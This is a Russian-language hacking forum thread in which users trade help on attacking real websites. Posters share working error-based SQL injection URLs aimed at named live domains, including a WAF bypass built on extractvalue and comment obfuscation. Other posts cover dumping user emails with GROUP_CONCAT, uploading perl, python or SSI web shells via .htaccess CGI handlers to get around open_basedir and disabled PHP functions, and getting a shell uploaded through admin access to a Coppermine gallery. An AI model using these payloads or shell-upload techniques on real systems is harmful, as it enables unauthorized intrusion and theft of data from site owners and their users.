Вопросы по уязвимостям

[romashka_sky]

Цитата:

Сообщение от zuzzz

Есть ли возможность обойти ограничение open_basedir и прочитать файлы?
Linux 3.3.4-gentoo
php 5.3.20
Запрещены функции: exec, dl, passthru, pcntl_exec, popen, proc_open, shell_exec, symlink, system
В mysql нет прав на чтение файлов.

Нашел только способ, как список файлов перебрать. Но это не интересно и в логах куча мусора от брута.

попробуйте воспользоваться perl-, python- или ssi-шеллом

[faza02]

выставил чмод 755 и залил .htaccess вида

Цитата:

Options +ExecCGI
AddHandler cgi-script cgi pl

но почему-то Internal Server Error
что еще нужно питон и прел шеллу?

[Pashkela]

AllowOwerride All в httpd.conf

+ правильно указать в скрипте путь к питону или к перлу ($ which perl python )

+ отсутствие .htaccess в папке, куда льем, если веб-шелла еще нет

[Flakt]

Версию вывел, таблицы не выводятся

_http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'and(selec t*from(select(name_const(version(),1)),name_const( version(),1))a)and'

[spari]

Цитата:

Сообщение от Flakt

Версию вывел, таблицы не выводятся

_http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'and(selec t*from(select(name_const(version(),1)),name_const( version(),1))a)and'

you can get the tables using extractvalue(),since the version is bigger than 5.1
the waf blocks 'information_schema.tables' and there is whitespace,but you can bypass the waf like that-

Код:

http://mmc-chariot.ru/index.php?Itemid=10&option=com_fireboard&func=show cat&Go=%D0%98%D0%B4%D1%82%D0%B8&catid=29'*extractvalue(1,concat_ws(0x27,0x27,(select(table_name)from(information_schema/*!.*/tables)where(table_schema)=schema()limit/**/0,1)))*'

[aka_zver]

имеется Coppermine Photo Gallery 1.5.12 и админский доступ, вопрос: как залиться? вариант с загрузкой через плагины не катит почему-то, старые способы тоже. Есть идеи?

[DeepShadow]

Помогите понять...

hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)or(3)='1 - Error:
Syntax error converting the nvarchar value 'Del_Art' to a column of data type int.


hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN 'Del_Art')or(3)='1
Error:
Incorrect syntax near the keyword 'NOT'.

[durito]

Цитата:

Сообщение от Dr.Z3r0

Продолжаем апдейтить статью =) Недавно потребовалось дампить таблицу с 1 милионом записей через скулю. Было перелопаченно множество инфы, написан эксплойт под один из методов, и заодно я решил добавить описание всех известных методов в статью.

вот столкнулся с очень интересной траблой в group_dumper.txt, один и тот же запрос, на одном и том же сайте в случае обращения к данным в таблицах site1.users и site2.users , в первом случае выводит все данные между начальным и конечным значением, во втором - только часть данных с начальным значением. не видя конечного значения, скрипт не дампит. вопрос почему не выводятся все данные включая конечное значение?

Код:

 +UNION+SELECT+1%2CCONCAT%280x68646A7338636466323364%2CGROUP_CONCAT%28CONCAT_WS%280x3a%2Csex%2Cemail%29+ORDER+BY+CONCAT_WS%280x3a%2Csex%2Cemail%29+SEPARATOR+0x7c%29%2C0x6A75396F776B65646E7373%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10+FROM+site1.users+WHERE+1--+

[spari]

Цитата:

Сообщение от DeepShadow

Помогите понять...

hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)or(3)='1 - Error:
Syntax error converting the nvarchar value 'Del_Art' to a column of data type int.


hххp://www.itals ystem.com/m all/repo rtbrd.asp?G=11'or(1)=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN 'Del_Art')or(3)='1
Error:
Incorrect syntax near the keyword 'NOT'.

you can set a condition,and make the webserver ignore the table.

Код:

information_schema.tables where table_name!="Del_Art"

and then the other table,

Код:

information_schema.tables where table_name!="Del_Art" and table_name!="table2"

[durito]

Итак имеем error based:

Код:

http://www.site.cov/search.php?a[]=0)+or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1/*

Duplicate entry '4.1.14-standard1' for key 1

Знаем таблицу и поля:

Код:

http://www.site.cov/search.php?a[]=0)+or 1 group by concat((select concat_ws(0x3a,id,uname,0x3a) from members+limit+1,1),floor(rand(0)*2)) having min(0) or 1/*

но получаем стандартный вывод поисковика, без сообщения об ошибке

если убрать limit то соответственно: Subquery returns more than 1 row

куды копать?